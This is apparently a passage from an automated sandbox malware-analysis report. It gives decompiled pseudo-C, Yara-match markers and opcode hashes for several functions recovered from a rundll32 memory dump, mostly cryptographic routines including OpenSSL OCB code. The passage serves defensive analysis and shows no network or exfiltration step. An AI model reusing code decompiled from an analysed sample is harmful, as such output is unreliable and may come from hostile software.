				 *(__rbx + 0xc8) =  *(__rbx + 0xc8) | 0x00000080;
				_a80 = _a80 + 1;
				if (_a80 - E0000021E21EF30290D0(_t71, __rdi) < 0) goto 0xf304a761;
				E0000021E21EF3029110(__rax, __rbx, __rdi, E0000021E21EF304C500, __rdi, __rbp);
				r9d = 0;
				r8d = 0;
				E0000021E21EF3091730(__rax, _t139);
				if (__rax == 0) goto 0xf304a85d;
				if ( *((intOrPtr*)(__rax)) - __ebp <= 0) goto 0xf304a848;
				 *(_t139 + 0xcc) =  *( *(__rax + 8)) & 0x000000ff;
				goto 0xf304a84e;
				 *(_t139 + 0xcc) = __ebp;
				 *(_t139 + 0xc0) =  *(_t139 + 0xc0) | 0x00000008;
				E0000021E21EF30749F0(__rax);
				r9d = 0;
				r8d = 0;
				E0000021E21EF3091730(_t138, _t139);
				r9d = 0;
				 *((long long*)(_t139 + 0xd0)) = _t138;
				r8d = 0;
				_t77 = E0000021E21EF3091730(_t138, _t139);
				 *((long long*)(_t139 + 0xd8)) = _t138;
				E0000021E21EF30480C0(E0000021E21EF3035740(_t77, _t139), _t139);
				if (E0000021E21EF3047B30(_t138, _t139, _t138, _t138) != 0) goto 0xf304a8e8;
				 *(_t139 + 0xc0) =  *(_t139 + 0xc0) | 0x00000020;
				if (E0000021E21EF3049EB0(_t138, _t139,  *((intOrPtr*)(_t139 + 0xd8)), __rsi) != 0) goto 0xf304a8e8;
				_t82 =  *(_t139 + 0xc0);
				if ((_t82 & 0x00000002) == 0) goto 0xf304a8de;
				if (( *(_t139 + 0xc4) & 0x00000004) == 0) goto 0xf304a8e8;
				asm("bts eax, 0xd");
				 *(_t139 + 0xc0) = _t82;
				r9d = 0;
				r8d = 0;
				E0000021E21EF3091730(_t138, _t139);
				r9d = 0;
				 *((long long*)(_t139 + 0xf0)) = _t138;
				E0000021E21EF3091730(_t138, _t139);
				 *((long long*)(_t139 + 0xf8)) = _t138;
				if (_t138 != 0) goto 0xf304a933;
				if (_a80 == 0xffffffff) goto 0xf304a933;
				 *(_t139 + 0xc0) =  *(_t139 + 0xc0) | 0x00000080;
				E0000021E21EF304A430(_a80 - 0xffffffff, _t138, _t139, _t139, _t138);
				r9d = 0;
				r8d = 0;
				E0000021E21EF3091730(_t138, _t139);
				r9d = 0;
				 *((long long*)(_t139 + 0x100)) = _t138;
				r8d = 0;
				E0000021E21EF3091730(_t138, _t139);
				 *((long long*)(_t139 + 0x108)) = _t138;
				_a80 = __ebp;
				if (_a80 - E0000021E21EF3091710(_t138, _t139) >= 0) goto 0xf304aa2e;
				E0000021E21EF30916D0(_t138, _t139);
				E0000021E21EF30AC080(_t138);
				if (E0000021E21EF3031F80(_t138, _t138) != 0x359) goto 0xf304a9c1;
				 *(_t139 + 0xc0) =  *(_t139 + 0xc0) | 0x00001000;
				if (E0000021E21EF3091750(_t138) == 0) goto 0xf304aa0a;
				E0000021E21EF30AC080(_t138);
				_t94 = E0000021E21EF3031F80(_t138, _t138);
				_a88 = _t94;
				if (_t94 == 0) goto 0xf304aa24;
				r9d = 4;
				_a32 = 0xf309af50;
				_t59 = _t184 + 0xa; // 0xa
				r8d = _t59;
				E0000021E21EF30319D0(_t138);
				if (_t138 == 0) goto 0xf304aa24;
				_a80 = _a80 + 1;
				_t96 = E0000021E21EF3091710(_t138, _t139);
				if (_a80 - _t96 < 0) goto 0xf304a993;
				goto 0xf304aa2e;
				 *(_t139 + 0xc0) =  *(_t139 + 0xc0) | 0x00000200;
				 *(_t139 + 0xc0) =  *(_t139 + 0xc0) | 0x00000100;
				return _t96;
			}













                                        0x21ef304a79e
                                        0x21ef304a79e
                                        0x21ef304a79e
                                        0x21ef304a7a0
                                        0x21ef304a7a2
                                        0x21ef304a7a4
                                        0x21ef304a7a6
                                        0x21ef304a7a9
                                        0x21ef304a7ab
                                        0x21ef304a7ae
                                        0x21ef304a7b6
                                        0x21ef304a7b8
                                        0x21ef304a7bb
                                        0x21ef304a7bd
                                        0x21ef304a7bf
                                        0x21ef304a7c1
                                        0x21ef304a7c1
                                        0x21ef304a7c1
                                        0x21ef304a7c4
                                        0x21ef304a7c6
                                        0x21ef304a7c9
                                        0x21ef304a7ce
                                        0x21ef304a7d2
                                        0x21ef304a7d4
                                        0x21ef304a7d6
                                        0x21ef304a7d8
                                        0x21ef304a7df
                                        0x21ef304a7e1
                                        0x21ef304a7eb
                                        0x21ef304a7ed
                                        0x21ef304a7f7
                                        0x21ef304a809
                                        0x21ef304a819
                                        0x21ef304a81e
                                        0x21ef304a821
                                        0x21ef304a82b
                                        0x21ef304a833
                                        0x21ef304a837
                                        0x21ef304a840
                                        0x21ef304a846
                                        0x21ef304a848
                                        0x21ef304a84e
                                        0x21ef304a858
                                        0x21ef304a85d
                                        0x21ef304a860
                                        0x21ef304a86a
                                        0x21ef304a86f
                                        0x21ef304a872
                                        0x21ef304a879
                                        0x21ef304a883
                                        0x21ef304a88b
                                        0x21ef304a89d
                                        0x21ef304a8af
                                        0x21ef304a8bb
                                        0x21ef304a8c9
                                        0x21ef304a8cb
                                        0x21ef304a8d3
                                        0x21ef304a8dc
                                        0x21ef304a8de
                                        0x21ef304a8e2
                                        0x21ef304a8e8
                                        0x21ef304a8eb
                                        0x21ef304a8f5
                                        0x21ef304a8fa
                                        0x21ef304a8fd
                                        0x21ef304a911
                                        0x21ef304a916
                                        0x21ef304a920
                                        0x21ef304a927
                                        0x21ef304a929
                                        0x21ef304a936
                                        0x21ef304a93b
                                        0x21ef304a93e
                                        0x21ef304a949
                                        0x21ef304a94e
                                        0x21ef304a951
                                        0x21ef304a958
                                        0x21ef304a963
                                        0x21ef304a96b
                                        0x21ef304a972
                                        0x21ef304a986
                                        0x21ef304a998
                                        0x21ef304a9a3
                                        0x21ef304a9b5
                                        0x21ef304a9b7
                                        0x21ef304a9cb
                                        0x21ef304a9d0
                                        0x21ef304a9d8
                                        0x21ef304a9dd
                                        0x21ef304a9e3
                                        0x21ef304a9e5
                                        0x21ef304a9eb
                                        0x21ef304a9fc
                                        0x21ef304a9fc
                                        0x21ef304aa00
                                        0x21ef304aa08
                                        0x21ef304aa0a
                                        0x21ef304aa11
                                        0x21ef304aa1c
                                        0x21ef304aa22
                                        0x21ef304aa24
                                        0x21ef304aa2e
                                        0x21ef304aa47

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID: 0-3916222277
                                        • Opcode ID: 4e2a2d3ebdd26eddb8fd311a2c26a85e33e11756cd8a3ad09c850db554574ccb
                                        • Instruction ID: ee34b2f28607c13b6284c1336a641f908b209454309bf36956331f997d26b3c5
                                        • Opcode Fuzzy Hash: 4e2a2d3ebdd26eddb8fd311a2c26a85e33e11756cd8a3ad09c850db554574ccb
                                        • Instruction Fuzzy Hash: DF51713230528186EF589B61ED29BEF77A1E7A1784F169036DE4647F86EB7CC902C710
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF304A7B9 Relevance: 1.4, Strings: 1, Instructions: 146COMMONCrypto
                                        Download Yara Rule
                                        C-Code - Quality: 77%
                                        			E0000021E21EF304A7B9(void* __eax, void* __ebx, void* __edx, void* __edi, signed int __ebp, long long __rax, void* __rbx, intOrPtr* __rcx, void* __rdi, void* __rsi, void* __rbp, void* __r9, long long _a32, void* _a48, void* _a56, signed int _a80, intOrPtr _a88, void* _a96) {
				signed char _t60;
				signed char _t61;
				void* _t67;
				signed char _t72;
				intOrPtr _t84;
				void* _t86;
				signed int _t106;
				long long _t124;
				void* _t125;
				void* _t169;

				_t169 = __r9;
				_t125 = __rbx;
				_t124 = __rax;
				 *((intOrPtr*)(__rax)) =  *((intOrPtr*)(__rax)) + __eax;
				 *((intOrPtr*)(__rax)) =  *((intOrPtr*)(__rax)) + __edx;
				goto 0xf304a7f7;
				_t1 = __rbx + 0xc8;
				 *_t1 =  *(__rbx + 0xc8) | 0x00000040;
				_t106 =  *_t1;
				 *((intOrPtr*)(__rax)) =  *((intOrPtr*)(__rax)) + __eax;
				 *((intOrPtr*)(__rax - 0x15)) =  *((intOrPtr*)(__rax - 0x15)) + __eax;
				_t60 = __eax - 0xc88b83;
				 *((intOrPtr*)(__rax)) =  *((intOrPtr*)(__rax)) + _t60;
				_t61 = _t60 & 0x0000003d;
				 *__rcx =  *__rcx - _t61;
				 *((intOrPtr*)(__rax)) =  *((intOrPtr*)(__rax)) + _t61;
				if (_t106 == 0) goto 0xf304a7ed;
				if (_t61 != 0x38e) goto 0xf304a7f7;
				 *(__rbx + 0xc8) =  *(__rbx + 0xc8) | 0x00000100;
				goto 0xf304a7f7;
				 *(__rbx + 0xc8) =  *(__rbx + 0xc8) | 0x00000080;
				_a80 = _a80 + 1;
				if (_a80 - E0000021E21EF30290D0(_t61, __rdi) < 0) goto 0xf304a761;
				E0000021E21EF3029110(__rax, __rbx, __rdi, E0000021E21EF304C500, __rdi, __rbp);
				r9d = 0;
				r8d = 0;
				E0000021E21EF3091730(__rax, _t125);
				if (__rax == 0) goto 0xf304a85d;
				if ( *((intOrPtr*)(__rax)) - __ebp <= 0) goto 0xf304a848;
				 *(_t125 + 0xcc) =  *( *(__rax + 8)) & 0x000000ff;
				goto 0xf304a84e;
				 *(_t125 + 0xcc) = __ebp;
				 *(_t125 + 0xc0) =  *(_t125 + 0xc0) | 0x00000008;
				E0000021E21EF30749F0(__rax);
				r9d = 0;
				r8d = 0;
				E0000021E21EF3091730(_t124, _t125);
				r9d = 0;
				 *((long long*)(_t125 + 0xd0)) = _t124;
				r8d = 0;
				_t67 = E0000021E21EF3091730(_t124, _t125);
				 *((long long*)(_t125 + 0xd8)) = _t124;
				E0000021E21EF30480C0(E0000021E21EF3035740(_t67, _t125), _t125);
				if (E0000021E21EF3047B30(_t124, _t125, _t124, _t124) != 0) goto 0xf304a8e8;
				 *(_t125 + 0xc0) =  *(_t125 + 0xc0) | 0x00000020;
				if (E0000021E21EF3049EB0(_t124, _t125,  *((intOrPtr*)(_t125 + 0xd8)), __rsi) != 0) goto 0xf304a8e8;
				_t72 =  *(_t125 + 0xc0);
				if ((_t72 & 0x00000002) == 0) goto 0xf304a8de;
				if (( *(_t125 + 0xc4) & 0x00000004) == 0) goto 0xf304a8e8;
				asm("bts eax, 0xd");
				 *(_t125 + 0xc0) = _t72;
				r9d = 0;
				r8d = 0;
				E0000021E21EF3091730(_t124, _t125);
				r9d = 0;
				 *((long long*)(_t125 + 0xf0)) = _t124;
				E0000021E21EF3091730(_t124, _t125);
				 *((long long*)(_t125 + 0xf8)) = _t124;
				if (_t124 != 0) goto 0xf304a933;
				if (_a80 == 0xffffffff) goto 0xf304a933;
				 *(_t125 + 0xc0) =  *(_t125 + 0xc0) | 0x00000080;
				E0000021E21EF304A430(_a80 - 0xffffffff, _t124, _t125, _t125, _t124);
				r9d = 0;
				r8d = 0;
				E0000021E21EF3091730(_t124, _t125);
				r9d = 0;
				 *((long long*)(_t125 + 0x100)) = _t124;
				r8d = 0;
				E0000021E21EF3091730(_t124, _t125);
				 *((long long*)(_t125 + 0x108)) = _t124;
				_a80 = __ebp;
				if (_a80 - E0000021E21EF3091710(_t124, _t125) >= 0) goto 0xf304aa2e;
				E0000021E21EF30916D0(_t124, _t125);
				E0000021E21EF30AC080(_t124);
				if (E0000021E21EF3031F80(_t124, _t124) != 0x359) goto 0xf304a9c1;
				 *(_t125 + 0xc0) =  *(_t125 + 0xc0) | 0x00001000;
				if (E0000021E21EF3091750(_t124) == 0) goto 0xf304aa0a;
				E0000021E21EF30AC080(_t124);
				_t84 = E0000021E21EF3031F80(_t124, _t124);
				_a88 = _t84;
				if (_t84 == 0) goto 0xf304aa24;
				r9d = 4;
				_a32 = 0xf309af50;
				_t49 = _t169 + 0xa; // 0xa
				r8d = _t49;
				E0000021E21EF30319D0(_t124);
				if (_t124 == 0) goto 0xf304aa24;
				_a80 = _a80 + 1;
				_t86 = E0000021E21EF3091710(_t124, _t125);
				if (_a80 - _t86 < 0) goto 0xf304a993;
				goto 0xf304aa2e;
				 *(_t125 + 0xc0) =  *(_t125 + 0xc0) | 0x00000200;
				 *(_t125 + 0xc0) =  *(_t125 + 0xc0) | 0x00000100;
				return _t86;
			}













                                        0x21ef304a7b9
                                        0x21ef304a7b9
                                        0x21ef304a7b9
                                        0x21ef304a7bb
                                        0x21ef304a7bd
                                        0x21ef304a7bf
                                        0x21ef304a7c1
                                        0x21ef304a7c1
                                        0x21ef304a7c1
                                        0x21ef304a7c4
                                        0x21ef304a7c6
                                        0x21ef304a7c9
                                        0x21ef304a7ce
                                        0x21ef304a7d2
                                        0x21ef304a7d4
                                        0x21ef304a7d6
                                        0x21ef304a7d8
                                        0x21ef304a7df
                                        0x21ef304a7e1
                                        0x21ef304a7eb
                                        0x21ef304a7ed
                                        0x21ef304a7f7
                                        0x21ef304a809
                                        0x21ef304a819
                                        0x21ef304a81e
                                        0x21ef304a821
                                        0x21ef304a82b
                                        0x21ef304a833
                                        0x21ef304a837
                                        0x21ef304a840
                                        0x21ef304a846
                                        0x21ef304a848
                                        0x21ef304a84e
                                        0x21ef304a858
                                        0x21ef304a85d
                                        0x21ef304a860
                                        0x21ef304a86a
                                        0x21ef304a86f
                                        0x21ef304a872
                                        0x21ef304a879
                                        0x21ef304a883
                                        0x21ef304a88b
                                        0x21ef304a89d
                                        0x21ef304a8af
                                        0x21ef304a8bb
                                        0x21ef304a8c9
                                        0x21ef304a8cb
                                        0x21ef304a8d3
                                        0x21ef304a8dc
                                        0x21ef304a8de
                                        0x21ef304a8e2
                                        0x21ef304a8e8
                                        0x21ef304a8eb
                                        0x21ef304a8f5
                                        0x21ef304a8fa
                                        0x21ef304a8fd
                                        0x21ef304a911
                                        0x21ef304a916
                                        0x21ef304a920
                                        0x21ef304a927
                                        0x21ef304a929
                                        0x21ef304a936
                                        0x21ef304a93b
                                        0x21ef304a93e
                                        0x21ef304a949
                                        0x21ef304a94e
                                        0x21ef304a951
                                        0x21ef304a958
                                        0x21ef304a963
                                        0x21ef304a96b
                                        0x21ef304a972
                                        0x21ef304a986
                                        0x21ef304a998
                                        0x21ef304a9a3
                                        0x21ef304a9b5
                                        0x21ef304a9b7
                                        0x21ef304a9cb
                                        0x21ef304a9d0
                                        0x21ef304a9d8
                                        0x21ef304a9dd
                                        0x21ef304a9e3
                                        0x21ef304a9e5
                                        0x21ef304a9eb
                                        0x21ef304a9fc
                                        0x21ef304a9fc
                                        0x21ef304aa00
                                        0x21ef304aa08
                                        0x21ef304aa0a
                                        0x21ef304aa11
                                        0x21ef304aa1c
                                        0x21ef304aa22
                                        0x21ef304aa24
                                        0x21ef304aa2e
                                        0x21ef304aa47

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID: 0-3916222277
                                        • Opcode ID: ffc1cc11a4c23583d4d14f45511aaee4435bfcd379a2bb1858b3f3bb88fc3e90
                                        • Instruction ID: 0c05f68b465636ad685bcb0a4a8d4060c61f4577115e3e7d89173ff634ee5be2
                                        • Opcode Fuzzy Hash: ffc1cc11a4c23583d4d14f45511aaee4435bfcd379a2bb1858b3f3bb88fc3e90
                                        • Instruction Fuzzy Hash: 4551813230528186EF589B61ED29BEF77A1E7A1784F169036DE4647F86EB7CC902C710
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF3125E3C Relevance: 1.4, Strings: 1, Instructions: 139COMMONLIBRARYCODECrypto
                                        Download Yara Rule
                                        C-Code - Quality: 53%
                                        			E0000021E21EF3125E3C(void* __eax, signed int __edx, long long __rbx, signed long long*** __rcx, long long __rdi, signed long long __rsi, long long __rbp, void* _a8, void* _a16, void* _a24, void* _a32) {
				void* _t28;
				signed int _t56;
				void* _t58;
				void* _t69;
				signed long long _t70;
				void* _t75;
				signed int* _t81;
				signed long long _t83;
				signed long long _t85;
				signed long long _t86;
				signed long long _t102;
				signed long long _t103;
				signed long long _t105;
				signed long long _t111;
				signed long long _t113;
				void* _t122;
				signed long long _t125;
				signed long long _t126;
				signed long long _t127;
				signed long long* _t132;
				void* _t133;
				signed long long _t137;
				signed long long*** _t140;

				_t113 = __rsi;
				_t56 = __edx;
				_t69 = _t122;
				 *((long long*)(_t69 + 8)) = __rbx;
				 *((long long*)(_t69 + 0x10)) = __rbp;
				 *((long long*)(_t69 + 0x18)) = __rsi;
				 *((long long*)(_t69 + 0x20)) = __rdi;
				_push(_t133);
				_t70 =  *((intOrPtr*)(__rcx));
				_t140 = __rcx;
				_t81 =  *_t70;
				if (_t81 != 0) goto 0xf3125e71;
				goto 0xf3125ff7;
				_t125 =  *0xf3203000; // 0x1fc8e4a4378e
				r12d = 0x40;
				_t118 =  *_t81 ^ _t125;
				asm("dec eax");
				_t83 = _t81[4] ^ _t125;
				asm("dec ecx");
				asm("dec eax");
				if ((_t81[2] ^ _t125) != _t83) goto 0xf3125f71;
				_t85 = _t83 - ( *_t81 ^ _t125) >> 3;
				_t108 =  >  ? _t70 : _t85;
				_t109 = ( >  ? _t70 : _t85) + _t85;
				_t110 =  ==  ? _t70 : ( >  ? _t70 : _t85) + _t85;
				if (( ==  ? _t70 : ( >  ? _t70 : _t85) + _t85) - _t85 < 0) goto 0xf3125ef0;
				r8d = _t133 - 0x38;
				E0000021E21EF3132494(_t133 - 0x20, r8d & 0x0000003f, _t58, _t85, _t118,  ==  ? _t70 : ( >  ? _t70 : _t85) + _t85, __rsi, _t118, _t125);
				_t28 = E0000021E21EF3124EE0(_t70, _t118);
				if (_t70 != 0) goto 0xf3125f18;
				_t111 = _t85 + 4;
				r8d = 8;
				E0000021E21EF3132494(_t28, 0, _t58, _t85, _t118, _t111, _t113, _t118, _t125);
				_t137 = _t70;
				E0000021E21EF3124EE0(_t70, _t118);
				if (_t137 == 0) goto 0xf3125e69;
				_t126 =  *0xf3203000; // 0x1fc8e4a4378e
				_t132 = _t137 + _t85 * 8;
				_t86 = _t137 + _t111 * 8;
				asm("dec eax");
				_t75 =  >  ? _t113 : _t86 - _t132 + 7 >> 3;
				if (_t75 == 0) goto 0xf3125f71;
				 *_t132 = _t113 ^ _t126;
				if (_t113 + 1 != _t75) goto 0xf3125f5b;
				_t127 =  *0xf3203000; // 0x1fc8e4a4378e
				asm("dec eax");
				 *_t132 =  *(_t140[1]) ^ _t127;
				_t102 =  *0xf3203000; // 0x1fc8e4a4378e
				asm("dec eax");
				 *( *( *_t140)) = _t137 ^ _t102;
				_t103 =  *0xf3203000; // 0x1fc8e4a4378e
				asm("dec ecx");
				( *( *_t140))[1] =  &(_t132[1]) ^ _t103;
				_t105 =  *0xf3203000; // 0x1fc8e4a4378e
				r12d = r12d - (_t56 & 0x0000003f);
				asm("dec eax");
				( *( *_t140))[2] = _t86 ^ _t105;
				return 0;
			}


























                                        0x21ef3125e3c
                                        0x21ef3125e3c
                                        0x21ef3125e3c
                                        0x21ef3125e3f
                                        0x21ef3125e43
                                        0x21ef3125e47
                                        0x21ef3125e4b
                                        0x21ef3125e4f
                                        0x21ef3125e59
                                        0x21ef3125e5e
                                        0x21ef3125e61
                                        0x21ef3125e67
                                        0x21ef3125e6c
                                        0x21ef3125e71
                                        0x21ef3125e78
                                        0x21ef3125e8f
                                        0x21ef3125e95
                                        0x21ef3125e98
                                        0x21ef3125e9b
                                        0x21ef3125e9e
                                        0x21ef3125ea4
                                        0x21ef3125eb2
                                        0x21ef3125ebc
                                        0x21ef3125ec5
                                        0x21ef3125ec8
                                        0x21ef3125ecf
                                        0x21ef3125ed1
                                        0x21ef3125edc
                                        0x21ef3125ee6
                                        0x21ef3125eee
                                        0x21ef3125ef0
                                        0x21ef3125ef4
                                        0x21ef3125f00
                                        0x21ef3125f07
                                        0x21ef3125f0a
                                        0x21ef3125f12
                                        0x21ef3125f18
                                        0x21ef3125f1f
                                        0x21ef3125f26
                                        0x21ef3125f35
                                        0x21ef3125f52
                                        0x21ef3125f59
                                        0x21ef3125f5e
                                        0x21ef3125f68
                                        0x21ef3125f6a
                                        0x21ef3125f86
                                        0x21ef3125f90
                                        0x21ef3125f93
                                        0x21ef3125fa6
                                        0x21ef3125faf
                                        0x21ef3125fb5
                                        0x21ef3125fc6
                                        0x21ef3125fcf
                                        0x21ef3125fd3
                                        0x21ef3125fdf
                                        0x21ef3125fe8
                                        0x21ef3125ff3
                                        0x21ef3126015

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: @
                                        • API String ID: 0-2766056989
                                        • Opcode ID: ec4ddc6329df336c82c16dff0f76504d43fd22d5514629655868650dc617074e
                                        • Instruction ID: ed7898be36ef94e84035ef0938ff33e157c454435d3bd9cfbcd4b069211b8ea0
                                        • Opcode Fuzzy Hash: ec4ddc6329df336c82c16dff0f76504d43fd22d5514629655868650dc617074e
                                        • Instruction Fuzzy Hash: B1418072311A4486EF48CF2AE9583DAB7A1B368FD4F4A9026DE4D87B54DA3CC446C300
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF3062220 Relevance: 1.4, Strings: 1, Instructions: 104COMMONCrypto
                                        Download Yara Rule
                                        C-Code - Quality: 48%
                                        			E0000021E21EF3062220(long long __rax, long long __rbx, long long* __rcx, long long __rdx, long long __rdi, long long __rsi, long long __r8, long long* __r9, long long _a8, long long _a16, long long _a24, void* _a40, void* _a48, void* _a56, long long _a72, long long _a80) {
				void* _t80;
				void* _t92;
				void* _t93;
				long long _t96;
				intOrPtr _t99;
				intOrPtr _t100;
				long long* _t102;
				signed char* _t108;
				intOrPtr _t111;
				intOrPtr _t118;
				signed char* _t119;
				void* _t120;
				void* _t121;
				void* _t122;
				long long _t130;
				void* _t139;
				long long* _t140;

				_t130 = __r8;
				_t96 = __rax;
				_a8 = __rbx;
				_a16 = __rsi;
				_a24 = __rdi;
				E0000021E21EF310C220();
				_t125 = __rdx;
				r8d = 0xc0;
				_t102 = __r9;
				_t140 = __rcx;
				E0000021E21EF310E410(_t80, 0, _t92, _t93, __rcx, __rdx, __r8, __r8);
				r8d = 0xa7;
				 *((long long*)(_t140 + 0x28)) = 0;
				 *((long long*)(_t140 + 0x30)) = 5;
				_t6 = _t130 - 0x57; // 0xa1
				_t81 = _t6;
				E0000021E21EF3025700();
				 *((long long*)(_t140 + 0x58)) = _t96;
				if (_t96 == 0) goto 0xf30623ba;
				_t115 = _t140 + 0x38;
				 *((long long*)(_t140 + 8)) = _a72;
				_t98 = _a80;
				 *((long long*)(_t140 + 0x20)) = _a80;
				 *_t140 = _t102;
				 *((long long*)(_t140 + 0x10)) = __rdx;
				 *((long long*)(_t140 + 0x18)) = __r8;
				 *_t102();
				E0000021E21EF3062610(_t6, _a80, _t102, _t140 + 0x38, _t140 + 0x38, __rdx, _t140 + 0x48, _t139);
				 *(_t140 + 0x57) =  *(_t140 + 0x57) ^ (( *(_t140 + 0x38) & 0x000000ff) >> 0x00000007 & 0x000000ff) * 0x00000087;
				_t118 =  *((intOrPtr*)(_t140 + 0x58));
				E0000021E21EF3062610(_t6, _a80, _t102, _t140 + 0x48, _t140 + 0x38, __rdx, _t118, _t139);
				 *(_t118 + 0xf) =  *(_t118 + 0xf) ^ (( *(_t140 + 0x48) & 0x000000ff) >> 0x00000007 & 0x000000ff) * 0x00000087;
				_t108 =  *((intOrPtr*)(_t140 + 0x58));
				_t119 =  &(_t108[0x10]);
				E0000021E21EF3062610(_t6, _t98, _t102, _t108, _t140 + 0x38, _t125, _t119, _t139);
				_t119[0xf] = _t119[0xf] ^ (( *_t108 & 0x000000ff) >> 0x00000007 & 0x000000ff) * 0x00000087;
				_t99 =  *((intOrPtr*)(_t140 + 0x58));
				_t120 = _t99 + 0x20;
				E0000021E21EF3062610(_t81, _t99, _t102, _t99 + 0x10, _t115, _t125, _t120, _t139);
				 *(_t120 + 0xf) =  *(_t120 + 0xf) ^ (( *(_t99 + 0x10) & 0x000000ff) >> 0x00000007 & 0x000000ff) * 0x00000087;
				_t100 =  *((intOrPtr*)(_t140 + 0x58));
				_t121 = _t100 + 0x30;
				E0000021E21EF3062610(_t81, _t100, _t102, _t100 + 0x20, _t115, _t125, _t121, _t139);
				 *(_t121 + 0xf) =  *(_t121 + 0xf) ^ (( *(_t100 + 0x20) & 0x000000ff) >> 0x00000007 & 0x000000ff) * 0x00000087;
				_t111 =  *((intOrPtr*)(_t140 + 0x58));
				_t122 = _t111 + 0x40;
				E0000021E21EF3062610(_t81, _t100, _t102, _t111 + 0x30, _t115, _t125, _t122, _t139);
				 *(_t122 + 0xf) =  *(_t122 + 0xf) ^ (( *(_t111 + 0x30) & 0x000000ff) >> 0x00000007 & 0x000000ff) * 0x00000087;
				 *((long long*)(_t140 + 0x28)) = 4;
				return 1;
			}




















                                        0x21ef3062220
                                        0x21ef3062220
                                        0x21ef3062220
                                        0x21ef3062225
                                        0x21ef306222a
                                        0x21ef3062236
                                        0x21ef3062241
                                        0x21ef3062246
                                        0x21ef306224c
                                        0x21ef306224f
                                        0x21ef3062252
                                        0x21ef3062257
                                        0x21ef306225d
                                        0x21ef306226c
                                        0x21ef3062274
                                        0x21ef3062274
                                        0x21ef3062278
                                        0x21ef306227d
                                        0x21ef3062284
                                        0x21ef306228f
                                        0x21ef3062293
                                        0x21ef306229b
                                        0x21ef30622a3
                                        0x21ef30622a7
                                        0x21ef30622aa
                                        0x21ef30622ae
                                        0x21ef30622b2
                                        0x21ef30622d2
                                        0x21ef30622d7
                                        0x21ef30622e9
                                        0x21ef30622fc
                                        0x21ef3062301
                                        0x21ef3062309
                                        0x21ef3062310
                                        0x21ef3062323
                                        0x21ef3062328
                                        0x21ef3062330
                                        0x21ef3062338
                                        0x21ef306234e
                                        0x21ef3062353
                                        0x21ef306235b
                                        0x21ef3062363
                                        0x21ef3062379
                                        0x21ef306237e
                                        0x21ef3062381
                                        0x21ef3062389
                                        0x21ef30623a5
                                        0x21ef30623aa
                                        0x21ef30623b2
                                        0x21ef30623cf

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: ..\..\openssl-1.1.0f\crypto\modes\ocb128.c
                                        • API String ID: 0-1267065356
                                        • Opcode ID: 6b4998fcc8a68af9ad6c8557037b5ce1186b9dc7753541905d98c2a704ec836c
                                        • Instruction ID: f8bd92174f0364afec45e7af27ef8bfc88eb60f7614ba642530d69f1d5688f4f
                                        • Opcode Fuzzy Hash: 6b4998fcc8a68af9ad6c8557037b5ce1186b9dc7753541905d98c2a704ec836c
                                        • Instruction Fuzzy Hash: B941BE32204B91C1EB00CB66D548BEA7BA9F755784F568057EE8C4BBCBCABDD166C340
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF303D6C0 Relevance: 1.3, Strings: 1, Instructions: 49COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID: 0-3916222277
                                        • Opcode ID: ffc336b6fe9c5f9d0d9a73f9c0a6096c91eae253ef8ffdcf6b7396b1169ad808
                                        • Instruction ID: f1b50d5e1c9f2fe0a7000fa1484a9d1f78ff3218631fcac42f26c26866ec75d6
                                        • Opcode Fuzzy Hash: ffc336b6fe9c5f9d0d9a73f9c0a6096c91eae253ef8ffdcf6b7396b1169ad808
                                        • Instruction Fuzzy Hash: A5211872A146408BE784CB38E84638BB7F0F79C748F419115BA89C6A2AEB3CD591CF40
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF3097230 Relevance: .9, Instructions: 928COMMONCrypto
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E0000021E21EF3097230(unsigned int __ecx, signed int __rax, long long __rbx, signed int __rcx, signed int __rdx, long long __rdi, signed int __rsi, signed int __rbp, signed int __r8, signed int __r10, long long _a8, long long _a16, long long _a24, long long _a32) {
				signed int _t479;
				unsigned int _t495;
				signed int _t510;
				signed int _t512;
				signed int _t514;
				signed int _t516;
				signed int _t518;
				unsigned int _t520;
				signed int _t523;
				unsigned int _t527;
				signed int _t529;
				signed int _t532;
				unsigned int _t534;
				signed int _t536;
				unsigned int _t538;
				unsigned int _t550;
				unsigned int _t554;
				signed int _t560;
				unsigned int _t566;
				signed int _t570;
				signed int _t587;
				unsigned int _t599;
				signed int _t629;
				signed int _t633;
				signed int _t637;
				signed int _t639;
				unsigned int _t644;
